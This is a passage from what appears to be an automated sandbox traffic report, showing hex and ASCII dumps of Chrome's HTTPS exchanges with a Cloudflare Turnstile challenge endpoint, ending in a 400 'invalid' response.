                                                            2024-02-01 20:38:15 UTC1369INData Raw: 23 66 66 66 7d 7d 2e 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 7b 26 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72
                                                            Data Ascii: #fff}}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.clearfix{&:after{display:table;clear:both;content:""}.column{float:left;padding-r
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 64 79 2c 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72
                                                            Data Ascii: dy,.main-wrapper{display:block}}</style><meta http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 37 77 76 5f 68 57 70 65 49 45 4c 2d 39 42 38 55 53 78 6b 7a 70 58 71 47 79 68 46 50 58 4e 71 70 4e 45 64 6d 43 63 53 5f 56 57 5f 56 6d 72 57 48 59 47 36 71 45 63 4a 46 4a 56 46 4d 77 72 7a 6e 54 5f 2d 6a 75 68 78 59 6c 49 69 4b 41 68 73 61 4f 39 33 6b 62 75 77 4a 6e 6d 6f 33 70 32 75 41 46 50 50 71 7a 6a 7a 68 71 35 74 76 4e 42 63 5f 2d 49 49 64 43 6e 55 67 2d 4d 56 78 53 5f 33 39 65 74 53 4a 78 49 56 76 4e 70 38 46 4d 4f 79 33 41 70 6c 71 68 65 42 62 6e 76 39 54 6b 7a 7a 50 5a 6e 6b 6d 51 4f 64 35 53 58 51 71 6b 6b 57 69 34 6f 4f 52 71 6c 5a 65 63 52 66 68 52 58 62 69 30 44 64 48 47 46 67 6e 55 62 63 48 6c 79 66 43 37 4f 59 37 58 63 78 46 54 42 41 58 53 6b 6c 54 72 44 6a 6c 62 79 51 30 5a 6d 71 66 71 57 51 6d 5a 78 45 4a 34 2d 77 32 36 70 39 67 36 35 49
                                                            Data Ascii: 7wv_hWpeIEL-9B8USxkzpXqGyhFPXNqpNEdmCcS_VW_VmrWHYG6qEcJFJVFMwrznT_-juhxYlIiKAhsaO93kbuwJnmo3p2uAFPPqzjzhq5tvNBc_-IIdCnUg-MVxS_39etSJxIVvNp8FMOy3AplqheBbnv9TkzzPZnkmQOd5SXQqkkWi4oORqlZecRfhRXbi0DdHGFgnUbcHlyfC7OY7XcxFTBAXSklTrDjlbyQ0ZmqfqWQmZxEJ4-w26p9g65I
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 4d 68 64 4d 34 46 4d 53 4c 56 30 39 56 51 6c 58 4a 31 42 6d 45 54 6c 4a 39 55 4d 6e 77 76 42 49 36 39 61 61 46 49 78 2d 35 6c 66 72 70 4b 47 31 6b 5f 6a 61 37 45 6e 6e 30 69 75 73 76 4a 4d 37 45 6f 36 61 4c 34 54 5a 7a 47 41 53 38 2d 4b 5a 62 32 65 52 6b 39 78 70 61 59 52 6a 4b 47 56 47 44 4a 70 44 30 62 59 76 39 39 45 45 61 69 4e 5f 6d 59 66 67 37 36 6e 2d 2d 49 52 6f 49 4e 50 42 32 4c 75 63 54 46 61 5f 55 43 2d 4a 54 65 32 32 74 32 38 46 66 46 69 6c 6a 6d 70 4f 67 43 6b 49 59 57 32 72 37 52 37 71 6a 58 5a 69 6a 6b 48 4a 51 62 73 79 35 76 38 67 5f 65 6f 57 72 39 33 39 5f 5a 43 64 39 49 4d 4f 44 6b 62 73 45 6a 52 6e 5a 30 69 46 78 35 65 4a 70 4c 49 31 50 66 37 5a 48 6e 4d 65 36 4d 47 49 6a 4b 6e 2d 73 74 46 32 59 61 42 34 44 2d 4d 69 42 7a 54 66 6f 79 6b
                                                            Data Ascii: MhdM4FMSLV09VQlXJ1BmETlJ9UMnwvBI69aaFIx-5lfrpKG1k_ja7Enn0iusvJM7Eo6aL4TZzGAS8-KZb2eRk9xpaYRjKGVGDJpD0bYv99EEaiN_mYfg76n--IRoINPB2LucTFa_UC-JTe22t28FfFiljmpOgCkIYW2r7R7qjXZijkHJQbsy5v8g_eoWr939_ZCd9IMODkbsEjRnZ0iFx5eJpLI1Pf7ZHnMe6MGIjKn-stF2YaB4D-MiBzTfoyk
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 43 44 6b 53 56 65 55 75 6f 4a 31 6b 2d 5f 61 63 68 49 6c 6d 69 66 55 4e 4a 54 4f 41 45 4b 31 57 46 78 34 70 75 34 37 31 5f 50 54 71 33 76 52 37 68 53 47 37 43 4d 66 63 54 6b 71 62 6d 33 4d 56 34 63 6a 5a 4f 4d 68 5a 37 42 64 4c 6f 58 56 4b 41 6c 43 61 69 43 6b 37 36 70 50 30 68 62 57 4f 77 64 78 36 34 34 76 5a 53 68 37 42 48 74 49 6d 64 70 67 76 6b 34 47 45 61 6b 74 78 59 42 67 6b 6b 4b 77 78 4c 7a 4f 4e 46 56 68 6c 36 49 36 4a 65 45 34 2d 7a 4c 4e 6a 71 49 64 6c 42 71 6d 79 79 55 78 54 69 68 41 46 6f 62 36 36 42 32 74 4b 65 62 61 51 66 63 46 38 59 61 69 58 31 48 54 4d 58 37 63 69 4a 75 56 72 70 71 48 41 4c 34 5f 2d 76 64 4f 66 55 37 62 31 5a 68 4c 4c 70 4c 52 75 43 4f 43 75 6b 63 77 39 35 76 67 76 34 63 47 30 39 55 43 36 56 79 45 42 34 6d 47 5a 6f 56 6e
                                                            Data Ascii: CDkSVeUuoJ1k-_achIlmifUNJTOAEK1WFx4pu471_PTq3vR7hSG7CMfcTkqbm3MV4cjZOMhZ7BdLoXVKAlCaiCk76pP0hbWOwdx644vZSh7BHtImdpgvk4GEaktxYBgkkKwxLzONFVhl6I6JeE4-zLNjqIdlBqmyyUxTihAFob66B2tKebaQfcF8YaiX1HTMX7ciJuVrpqHAL4_-vdOfU7b1ZhLLpLRuCOCukcw95vgv4cG09UC6VyEB4mGZoVn


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.449754104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:15 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 3171
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: 40a43fe0ff648d1
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:15 UTC3171OUTData Raw: 76 5f 38 34 65 63 66 66 32 38 34 63 39 63 37 62 64 38 3d 72 38 41 36 67 36 4c 36 78 36 47 36 31 36 31 35 24 62 35 33 24 72 36 64 34 41 4e 34 46 6e 4e 53 75 41 24 72 53 24 69 4a 36 53 6b 6d 24 4c 53 76 24 69 63 6d 4c 6d 79 65 24 58 36 42 4e 55 53 49 24 59 36 53 30 78 4c 31 67 6f 24 37 32 24 49 41 24 65 24 31 38 37 35 24 37 55 57 6e 65 24 53 4e 37 46 24 69 57 6f 77 24 6c 34 53 2d 67 2d 57 32 54 37 45 56 36 37 58 24 39 53 36 53 6d 65 24 33 41 37 57 24 69 65 6b 24 2d 36 31 6d 54 77 44 24 37 69 5a 24 63 4e 42 33 77 50 6d 31 68 70 24 78 38 77 24 58 55 24 6c 6b 4e 24 70 30 66 24 42 36 4c 69 24 31 32 6e 35 48 47 65 44 46 4a 44 77 56 31 57 50 74 32 6e 51 41 34 24 6f 7a 66 24 4e 36 53 74 4f 34 4c 49 35 66 62 5a 6c 68 71 6f 46 64 47 44 6d 30 66 46 56 72 25 32 62 72
                                                            Data Ascii: v_84ecff284c9c7bd8=r8A6g6L6x6G61615$b53$r6d4AN4FnNSuA$rS$iJ6Skm$LSv$icmLmye$X6BNUSI$Y6S0xL1go$72$IA$e$1875$7UWne$SN7F$iWow$l4S-g-W2T7EV67X$9S6Sme$3A7W$iek$-61mTwD$7iZ$cNB3wPm1hp$x8w$XU$lkN$p0f$B6Li$12n5HGeDFJDwV1WPt2nQA4$ozf$N6StO4LI5fbZlhqoFdGDm0fFVr%2br
                                                            2024-02-01 20:38:15 UTC799INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:15 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-chl-gen: hojoc4dEUf0bpeFpOrcFELggA1jFvxXcIUPfvwKDwUpljHi+Fqyntc++HOSnblxNekyYgl495oYRwdfY0FX63iWfgTtFJt3lXWJSli6pFp58VxnbX8M3Pu20hXtyDXSuvyQKRl0Q24CSCJDjEs9nvceVOPimMZ1qWylmLxyeb7VWeey1xKIMqrYHZ+4TB7fNf/Xf07c5hqBDTIGlM2SpG/7/5I9StoX5pjxdrDjxB63CltsrFONJLIOqOxjA4qXuC7+VPcearxsRTfP38pzxrSJHkIDQt5hsSZZfgs70S0vQCVavfrkvX5P2H4cuAxHlsIO7jTM7cbcHSQ+FiPhJFmai6Dq3J9aMLTq+OSwvwOvTHlzTwOpUmfviTOTqP8UYcQ8zzJnoFYE/NHjYV+WELMmMdTCCaLs8Vl0BiO3PHUQceoggCVoBCDdnixVjcGHOvrv2H461WTIn6MAUk26Y4Tx37gui8j2xFozF9EW4A02X9wJXb9eW08HgCwci/dZCVV2JlkVcyxrAJ+B9SkZzCA==$by2X9wVQB9MrLufLqG60vQ==
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff39594906e6-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:15 UTC570INData Raw: 37 63 39 30 0d 0a 66 62 62 43 76 4c 36 78 74 38 53 45 74 34 79 4f 68 34 2f 4b 6a 36 4b 2f 76 36 50 59 72 37 48 52 6c 39 66 61 79 61 6d 2b 6d 73 7a 44 77 4a 33 6f 76 64 71 79 6f 38 50 4e 77 75 62 6a 77 74 72 4f 76 4d 72 56 39 4c 4c 51 38 37 76 33 39 62 76 4f 75 37 50 68 38 2f 33 6c 76 77 49 43 30 66 76 4c 36 75 54 68 79 73 2f 6a 36 50 73 4d 44 66 41 43 45 4f 6f 50 39 74 50 6e 36 4e 73 65 33 78 7a 34 32 78 48 35 45 39 38 56 42 76 34 6b 37 66 63 75 47 53 66 37 42 41 4d 32 43 79 51 49 41 76 49 57 38 77 7a 2b 4e 79 6f 77 2b 68 41 58 44 6a 34 61 4a 54 55 55 53 44 59 63 42 6a 77 68 47 68 4a 52 4a 69 42 46 52 6c 64 4d 53 68 51 71 57 56 52 66 54 78 6f 36 59 46 64 5a 4d 55 59 2f 52 53 73 35 52 30 74 49 53 55 78 6b 4d 31 42 69 51 32 5a 58 57 46 52 6d 62 6d 34 39 62
                                                            Data Ascii: 7c90fbbCvL6xt8SEt4yOh4/Kj6K/v6PYr7HRl9fayam+mszDwJ3ovdqyo8PNwubjwtrOvMrV9LLQ87v39bvOu7Ph8/3lvwIC0fvL6uThys/j6PsMDfACEOoP9tPn6Nse3xz42xH5E98VBv4k7fcuGSf7BAM2CyQIAvIW8wz+Nyow+hAXDj4aJTUUSDYcBjwhGhJRJiBFRldMShQqWVRfTxo6YFdZMUY/RSs5R0tISUxkM1BiQ2ZXWFRmbm49b
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 4f 7a 68 61 57 48 46 6d 57 30 46 32 59 32 39 42 4d 57 56 73 62 6d 31 5a 5a 31 56 4c 58 45 39 57 54 57 35 56 68 33 70 6e 65 32 42 37 66 48 70 77 62 59 4a 70 58 6c 57 41 6c 5a 6c 6c 6d 5a 56 72 65 31 71 4c 66 33 4a 63 6d 6e 69 51 6d 6c 32 68 68 34 74 6b 6d 6d 32 63 64 36 35 6e 6a 71 57 65 6a 71 57 41 6d 59 53 50 72 35 6c 31 64 35 4f 65 6f 48 2b 36 77 72 4f 55 76 61 61 43 75 6f 47 37 70 37 65 63 71 49 33 43 7a 5a 43 30 72 74 4c 4c 6c 71 72 59 7a 64 44 62 30 64 33 58 33 37 2f 64 75 4f 47 67 78 39 58 6f 79 4d 61 70 71 76 44 61 78 64 76 46 31 4f 4c 6b 79 4d 54 44 38 63 72 46 2b 4d 72 48 31 4e 6e 71 2b 39 51 48 38 73 58 43 2f 66 76 30 39 73 58 65 34 64 76 6c 41 75 66 4f 36 4d 33 6f 46 75 63 54 32 76 63 61 33 64 6f 59 37 66 73 57 39 53 4d 58 39 53 67 6a 4b 67 51
                                                            Data Ascii: OzhaWHFmW0F2Y29BMWVsbm1ZZ1VLXE9WTW5Vh3pne2B7fHpwbYJpXlWAlZllmZVre1qLf3JcmniQml2hh4tkmm2cd65njqWejqWAmYSPr5l1d5OeoH+6wrOUvaaCuoG7p7ecqI3CzZC0rtLLlqrYzdDb0d3X37/duOGgx9XoyMapqvDaxdvF1OLkyMTD8crF+MrH1Nnq+9QH8sXC/fv09sXe4dvlAufO6M3oFucT2vca3doY7fsW9SMX9SgjKgQ
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 46 52 53 51 6b 42 71 57 6c 56 6f 55 54 78 4e 67 47 31 66 4f 6b 43 46 63 56 71 45 58 6f 65 4a 64 6d 78 62 67 6b 47 4a 65 31 70 30 61 48 52 55 55 33 47 4b 64 34 75 51 64 4a 61 41 62 47 31 2b 58 6e 61 41 62 35 5a 69 64 32 53 62 71 33 61 4d 6f 6f 75 46 63 47 78 7a 63 36 71 43 74 6d 75 51 6d 4b 39 34 6d 62 47 2b 72 59 79 41 76 73 4b 6e 76 4a 4b 2f 6b 35 65 5a 66 35 71 4b 6f 61 32 6f 72 39 47 73 79 59 6e 57 6c 37 58 4d 71 72 7a 51 78 39 53 67 72 4f 47 38 74 74 53 35 30 74 50 5a 76 4e 58 71 34 72 2b 2b 79 37 44 6a 76 72 57 78 36 4d 7a 6e 36 50 4c 4d 79 50 53 37 30 38 76 35 33 65 48 65 77 66 76 45 42 50 4d 4b 7a 4e 66 64 32 4d 7a 6c 38 65 2f 6a 34 73 33 66 2b 4f 2f 36 46 50 4d 4d 33 67 48 53 32 68 50 5a 32 76 6b 68 46 42 6f 71 44 43 33 34 4a 43 77 62 2b 2b 4d 6c
                                                            Data Ascii: FRSQkBqWlVoUTxNgG1fOkCFcVqEXoeJdmxbgkGJe1p0aHRUU3GKd4uQdJaAbG1+XnaAb5Zid2Sbq3aMoouFcGxzc6qCtmuQmK94mbG+rYyAvsKnvJK/k5eZf5qKoa2or9GsyYnWl7XMqrzQx9SgrOG8ttS50tPZvNXq4r++y7DjvrWx6Mzn6PLMyPS708v53eHewfvEBPMKzNfd2Mzl8e/j4s3f+O/6FPMM3gHS2hPZ2vkhFBoqDC34JCwb++Ml
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 6b 32 64 31 4a 59 66 58 6f 33 63 6c 52 78 63 6e 64 42 68 30 6d 41 59 32 74 4c 6a 30 47 50 69 32 70 6c 63 49 78 70 6c 35 65 4a 68 47 71 54 66 47 78 79 61 33 4e 61 63 6f 35 66 58 59 64 78 5a 70 65 46 6f 6d 69 44 68 32 79 66 6b 71 71 49 61 34 79 53 6a 5a 69 59 72 72 4f 63 6e 59 78 38 72 4b 43 51 6b 61 36 6c 75 70 57 63 6c 36 66 48 72 4b 79 63 6a 4b 71 77 6f 49 79 6d 74 63 71 6c 75 4c 69 6b 70 37 75 36 30 4d 37 50 31 4b 79 37 74 4d 48 5a 35 4d 43 30 76 36 53 6f 33 64 72 6d 38 4f 76 63 77 4f 48 56 38 4c 69 77 32 73 2f 7a 36 62 37 31 2f 62 37 43 41 75 58 6d 41 51 54 62 39 66 54 6d 32 64 63 41 42 68 48 6e 79 64 4c 4f 36 4e 34 43 45 52 55 59 43 4f 6b 52 38 75 6b 43 47 52 59 62 2b 53 50 77 4a 77 55 58 41 43 55 4e 39 79 6b 66 37 78 4d 44 37 54 41 78 4a 43 76 30 4f
                                                            Data Ascii: k2d1JYfXo3clRxcndBh0mAY2tLj0GPi2plcIxpl5eJhGqTfGxya3Naco5fXYdxZpeFomiDh2yfkqqIa4ySjZiYrrOcnYx8rKCQka6lupWcl6fHrKycjKqwoIymtcqluLikp7u60M7P1Ky7tMHZ5MC0v6So3drm8OvcwOHV8Liw2s/z6b71/b7CAuXmAQTb9fTm2dcABhHnydLO6N4CERUYCOkR8ukCGRYb+SPwJwUXACUN9ykf7xMD7TAxJCv0O
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 31 50 33 68 54 67 58 69 41 65 31 4a 7a 5a 59 52 39 68 6d 43 47 58 31 4a 62 61 34 70 66 67 34 35 6b 56 34 6c 77 5a 57 64 56 65 33 4e 68 6a 48 47 6b 58 49 39 79 59 49 4b 48 66 5a 61 58 6e 71 71 73 68 6f 43 72 73 6e 36 75 68 34 4b 31 6b 59 75 2b 6e 37 43 77 65 4a 47 35 6b 73 57 39 66 63 65 31 70 4a 57 57 68 5a 2f 43 6d 4b 47 4e 69 38 36 30 30 4c 47 67 77 61 79 71 32 39 6e 4c 76 4e 4f 66 7a 72 4b 63 6f 4e 50 48 75 61 58 54 33 74 76 71 77 66 44 77 72 36 6d 70 36 2b 37 66 76 38 6e 77 73 63 7a 46 75 76 48 37 2f 4f 33 37 31 4e 44 55 76 51 4c 31 36 64 54 63 78 67 7a 49 44 65 59 42 34 2b 34 49 43 67 6f 46 43 65 7a 74 2f 50 49 58 48 41 37 61 34 52 55 51 2b 39 73 6b 32 65 41 4a 43 50 63 6c 4b 4f 44 68 2b 77 59 50 38 42 45 47 46 79 49 72 37 2f 48 36 4a 68 6b 49 4b 44
                                                            Data Ascii: 1P3hTgXiAe1JzZYR9hmCGX1Jba4pfg45kV4lwZWdVe3NhjHGkXI9yYIKHfZaXnqqshoCrsn6uh4K1kYu+n7CweJG5ksW9fce1pJWWhZ/CmKGNi8600LGgwayq29nLvNOfzrKcoNPHuaXT3tvqwfDwr6mp6+7fv8nwsczFuvH7/O371NDUvQL16dTcxgzIDeYB4+4ICgoFCezt/PIXHA7a4RUQ+9sk2eAJCPclKODh+wYP8BEGFyIr7/H6JhkIKD
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 4f 6b 4e 70 59 55 70 4e 59 6c 6c 6f 54 70 46 4c 64 59 42 32 69 45 71 53 69 58 57 59 62 35 42 76 6f 5a 78 71 61 34 4f 66 6f 70 4a 6a 67 49 4b 71 6f 4b 4e 74 71 32 75 75 6e 59 69 6f 74 71 71 6e 65 4b 4b 6b 67 35 71 5a 76 62 71 38 76 4c 65 50 6b 5a 2b 30 78 4c 53 39 78 70 75 47 67 37 71 50 70 73 2b 2f 30 71 58 51 31 6f 32 33 72 70 47 71 6a 72 61 6d 31 73 76 66 79 37 7a 41 73 4c 4b 32 31 4e 6d 2b 6f 75 53 74 71 75 6a 6e 78 61 33 63 73 4d 79 75 79 62 54 6c 77 37 6a 6f 33 76 62 57 32 4c 69 2f 7a 76 6a 51 38 2b 59 4b 38 64 6e 47 78 75 72 32 2f 76 6a 4c 44 66 77 43 41 74 49 45 34 77 2f 53 46 78 4d 65 2f 68 4c 58 36 65 4c 37 2b 75 50 34 39 65 49 5a 35 75 76 69 2b 53 63 59 45 50 30 79 4c 4f 59 75 4d 53 55 4d 41 68 49 5a 2f 50 55 30 4c 66 67 63 49 52 41 37 52 78 30
                                                            Data Ascii: OkNpYUpNYlloTpFLdYB2iEqSiXWYb5BvoZxqa4OfopJjgIKqoKNtq2uunYiotqqneKKkg5qZvbq8vLePkZ+0xLS9xpuGg7qPps+/0qXQ1o23rpGqjram1svfy7zAsLK21Nm+ouStqujnxa3csMyuybTlw7jo3vbW2Li/zvjQ8+YK8dnGxur2/vjLDfwCAtIE4w/SFxMe/hLX6eL7+uP49eIZ5uvi+ScYEP0yLOYuMSUMAhIZ/PU0LfgcIRA7Rx0
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 30 31 39 58 6b 68 78 5a 6f 46 74 6d 49 70 50 64 34 31 55 66 58 6c 58 58 48 75 65 6c 4a 70 64 6e 6e 64 66 5a 35 68 64 64 4b 65 65 6a 32 4b 43 73 35 2b 31 73 58 2b 31 69 33 57 47 68 61 36 75 73 72 71 72 77 6e 32 59 76 62 69 2f 68 63 53 45 78 63 48 4d 69 4d 65 33 6a 62 4c 4f 70 71 61 50 30 36 2b 71 32 63 69 6f 78 35 4f 30 75 63 69 62 32 62 75 67 33 4d 61 6e 70 65 44 64 31 39 6d 72 37 4b 57 39 78 4d 61 2f 76 36 7a 54 38 64 48 42 2b 62 6a 54 36 75 6e 4f 34 51 50 51 38 39 54 6c 31 4e 48 6f 2b 39 6f 4a 36 4e 58 58 37 64 77 43 37 2b 72 4b 30 63 7a 54 41 65 34 50 36 38 34 4b 45 52 55 59 33 68 48 69 48 66 6e 6c 45 50 6f 71 49 75 45 57 4a 4f 51 51 37 77 58 74 38 76 30 7a 2f 69 2f 76 39 78 77 62 39 41 59 77 2b 66 34 63 4f 44 63 4f 4f 52 77 34 4d 51 68 4c 53 55 30 39
                                                            Data Ascii: 019XkhxZoFtmIpPd41UfXlXXHuelJpdnndfZ5hddKeej2KCs5+1sX+1i3WGha6usrqrwn2Yvbi/hcSExcHMiMe3jbLOpqaP06+q2ciox5O0ucib2bug3ManpeDd19mr7KW9xMa/v6zT8dHB+bjT6unO4QPQ89Tl1NHo+9oJ6NXX7dwC7+rK0czTAe4P684KERUY3hHiHfnlEPoqIuEWJOQQ7wXt8v0z/i/v9xwb9AYw+f4cODcOORw4MQhLSU09
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 4e 50 6b 32 5a 53 6c 4a 53 45 6d 5a 4f 4a 63 6c 32 62 6e 4b 52 79 6c 70 36 6c 70 4b 68 70 66 33 6d 59 66 5a 79 6b 73 58 4e 39 70 61 70 78 64 5a 65 74 73 72 79 38 6a 72 70 2b 69 37 36 4e 68 4c 44 46 6f 4a 69 70 6c 73 44 49 6d 62 71 76 6f 64 4b 2f 6a 38 43 79 7a 4e 69 75 70 61 58 4b 75 72 69 36 30 4c 4f 79 6e 62 43 32 33 75 53 6e 32 70 75 39 6f 64 2f 4e 36 38 6e 61 37 65 4c 52 77 50 54 50 74 62 53 78 35 37 54 78 38 4e 54 6e 39 4c 66 4e 32 62 33 6b 42 50 6a 66 34 75 6a 44 39 74 33 39 35 73 66 35 33 65 49 4c 46 41 73 44 45 77 34 44 45 4f 76 79 38 52 50 35 46 74 38 6a 42 51 37 79 2b 2f 6b 57 42 50 59 56 44 78 38 76 42 4f 73 41 44 69 67 55 47 44 67 42 42 69 6e 32 45 7a 30 30 4b 69 76 37 49 78 34 75 4a 66 6a 35 46 6a 67 64 52 79 30 74 4b 68 73 66 48 7a 31 51 51
                                                            Data Ascii: NPk2ZSlJSEmZOJcl2bnKRylp6lpKhpf3mYfZyksXN9papxdZetsry8jrp+i76NhLDFoJiplsDImbqvodK/j8CyzNiupaXKuri60LOynbC23uSn2pu9od/N68na7eLRwPTPtbSx57Tx8NTn9LfN2b3kBPjf4ujD9t395sf53eILFAsDEw4DEOvy8RP5Ft8jBQ7y+/kWBPYVDx8vBOsADigUGDgBBin2Ez00Kiv7Ix4uJfj5FjgdRy0tKhsfHz1QQ
                                                            2024-02-01 20:38:15 UTC1369INData Raw: 4c 63 6e 4b 57 6b 48 2b 62 6e 58 69 42 63 6d 52 35 65 4b 42 6c 69 6e 5a 33 66 49 4b 78 73 4c 46 7a 68 6f 4b 48 67 6f 69 6a 69 48 52 35 71 6e 71 51 77 4a 71 6a 67 5a 6d 36 6e 72 36 59 6b 71 4c 4e 78 4d 2f 4e 71 4b 47 61 6d 37 33 54 6c 4e 58 53 6a 36 6d 72 6b 73 7a 56 76 4d 2f 62 77 73 2b 74 75 38 65 76 78 2b 72 56 7a 4e 2f 6b 36 4f 61 74 35 74 50 41 33 4e 4c 31 74 4d 44 69 36 37 66 75 37 4f 2f 5a 31 4f 48 4d 33 39 43 33 32 64 66 2b 77 4e 73 41 2b 51 66 4d 2f 50 6a 6a 42 2f 54 65 42 51 34 41 38 67 55 4c 45 78 49 49 46 78 50 59 38 68 45 6c 31 75 54 67 2f 65 62 35 2b 77 55 45 49 77 30 51 4a 42 38 66 4b 69 45 43 49 6a 45 70 46 68 6f 50 44 53 6b 4e 50 77 45 79 49 43 51 61 41 68 6f 35 41 30 67 48 49 30 52 46 54 69 78 4c 53 7a 51 68 49 56 55 66 46 69 55 32 4b 45
                                                            Data Ascii: LcnKWkH+bnXiBcmR5eKBlinZ3fIKxsLFzhoKHgoijiHR5qnqQwJqjgZm6nr6YkqLNxM/NqKGam73TlNXSj6mrkszVvM/bws+tu8evx+rVzN/k6Oat5tPA3NL1tMDi67fu7O/Z1OHM39C32df+wNsA+QfM/PjjB/TeBQ4A8gULExIIFxPY8hEl1uTg/eb5+wUEIw0QJB8fKiECIjEpFhoPDSkNPwEyICQaAho5A0gHI0RFTixLSzQhIVUfFiU2KE


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.449756104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:16 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:16 UTC386INHTTP/1.1 400 Bad Request
                                                            Date: Thu, 01 Feb 2024 20:38:16 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: siLeME1DQVXxlP8hoC6t6w==$igI3Y6iafe7rKsAYPspbJQ==
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff3fe8306757-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:16 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                            Data Ascii: 7invalid
